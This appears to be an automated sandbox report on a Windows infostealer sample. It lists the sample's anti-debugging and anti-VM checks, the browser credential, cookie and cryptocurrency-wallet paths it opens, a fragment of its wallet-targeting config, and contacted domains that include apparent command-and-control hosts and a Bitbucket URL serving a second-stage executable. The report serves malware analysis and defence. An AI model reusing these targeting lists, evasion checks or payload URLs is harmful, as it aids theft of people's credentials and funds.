                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DDA80 second address: 9DDA86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DDA86 second address: 9DDA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DDA8C second address: 9DDA96 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F05F0F5949Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DDA96 second address: 9DDAA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DDAA5 second address: 9DDAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DDAA9 second address: 9DDAAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DD629 second address: 9DD62D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DD62D second address: 9DD631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DD631 second address: 9DD64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F5949Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DF65F second address: 9DF67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F05F0F49764h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DF67B second address: 9DF685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F05F0F59496h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DF685 second address: 9DF696 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F05F0F49756h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F4DAC second address: 8F4DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Special instruction interceptor: First address: 8E9B1B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Special instruction interceptor: First address: 8F0AC4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Special instruction interceptor: First address: 978580 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 1536 Thread sleep time: -42021s >= -30000s
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 4424 Thread sleep time: -32016s >= -30000s
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 5404 Thread sleep time: -450000s >= -30000s
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 2104 Thread sleep time: -38019s >= -30000s
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 3012 Thread sleep time: -34017s >= -30000s
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 1240 Thread sleep time: -30015s >= -30000s
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Last function: Thread delayed
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2686849937.00000000008C9000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2686849937.00000000008C9000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: NTICE
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: SICE
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: TmmiCE5Ulm.exe, 00000000.00000002.2687094452.0000000000910000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
                Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: TmmiCE5Ulm.exe, TmmiCE5Ulm.exe, 00000000.00000003.2270285574.0000000001143000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2253010841.0000000001184000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2253010841.0000000001143000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2253010841.000000000112B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2270285574.0000000001128000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2253137538.000000000119F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: TmmiCE5Ulm.exe PID: 5600, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2253010841.0000000001184000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2231964807.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum\wallets\
                Source: TmmiCE5Ulm.exe String found in binary or memory: "app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2253010841.0000000001184000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]`=
                Source: TmmiCE5Ulm.exe String found in binary or memory: Wallets/Ethereum
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2228599565.000000000118B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, Directory queried: C:\Users\user\Documents\BJZFPPWAPT
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, Directory queried: C:\Users\user\Documents\EWZCVGNOWT
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, Directory queried: C:\Users\user\Documents\GRXZDKKVDB
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, Directory queried: C:\Users\user\Documents\NWCXBPIUYI
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, Directory queried: C:\Users\user\Documents\NYMMPCEIMA
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, Directory queried: number of queries: 1001
                Source: Yara match, File source: 00000000.00000003.2228599565.000000000118B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000003.2231964807.0000000001154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000003.2232123533.0000000001154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000003.2231739674.0000000001154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: TmmiCE5Ulm.exe PID: 5600, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match, File source: Process Memory Space: TmmiCE5Ulm.exe PID: 5600, type: MEMORYSTR
                Source: Yara match, File source: sslproxydump.pcap, type: PCAP
                Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
                Execution: 2 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Privilege Escalation: 2 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Defense Evasion: 34 Virtualization/Sandbox Evasion; 2 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                Discovery: 1 Query Registry; 751 Security Software Discovery; 34 Virtualization/Sandbox Evasion; 2 Process Discovery; 2 File and Directory Discovery; 223 System Information Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                Collection: 1 Archive Collected Data; 41 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
                Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

                Source | Detection | Scanner | Label
                TmmiCE5Ulm.exe | 58% | ReversingLabs | Win32.Infostealer.Tinba
                TmmiCE5Ulm.exe | 69% | Virustotal |
                TmmiCE5Ulm.exe | 100% | Avira | TR/Crypt.TPM.Gen
                TmmiCE5Ulm.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                s3-w.us-east-1.amazonaws.com
                3.5.16.86
                truefalse
                  high
                  bitbucket.org
                  185.166.143.49
                  truefalse
                    high
                    steamcommunity.com
                    23.55.153.106
                    truefalse
                      high
                      lev-tolstoi.com
                      104.21.66.86
                      truefalse
                        high
                        bbuseruploads.s3.amazonaws.com
                        unknown
                        unknownfalse
                          high
                          sweepyribs.lat
                          unknown
                          unknownfalse
                            high
                            necklacebudi.lat
                            unknown
                            unknownfalse
                              high
                              sustainskelet.lat
                              unknown
                              unknownfalse
                                high
                                crosshuaht.lat
                                unknown
                                unknownfalse
                                  high
                                  rapeflowwj.lat
                                  unknown
                                  unknownfalse
                                    high
                                    grannyejh.lat
                                    unknown
                                    unknownfalse
                                      high
                                      aspecteirs.lat
                                      unknown
                                      unknownfalse
                                        high
                                        discokeyus.lat
                                        unknown
                                        unknownfalse
                                          high
                                          energyaffai.lat
                                          unknown
                                          unknownfalse
                                            high
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://store.steampowered.com/about/TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://steamcommunity.com/my/wishlist/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001188000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B01000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001143000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exefTmmiCE5Ulm.exe, 00000000.00000002.2688164936.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://help.steampowered.com/en/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://steamcommunity.com/market/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://store.steampowered.com/news/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiTmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp;l=eTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe_1TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001149000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://store.steampowered.com/subscriber_agreement/TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://recaptcha.net/recaptcha/;TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netTmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://steamcommunity.com/discussions/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://lev-tolstoi.com/=9TmmiCE5Ulm.exe, 00000000.00000002.2689933527.0000000005A80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://store.steampowered.com/stats/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://medal.tvTmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
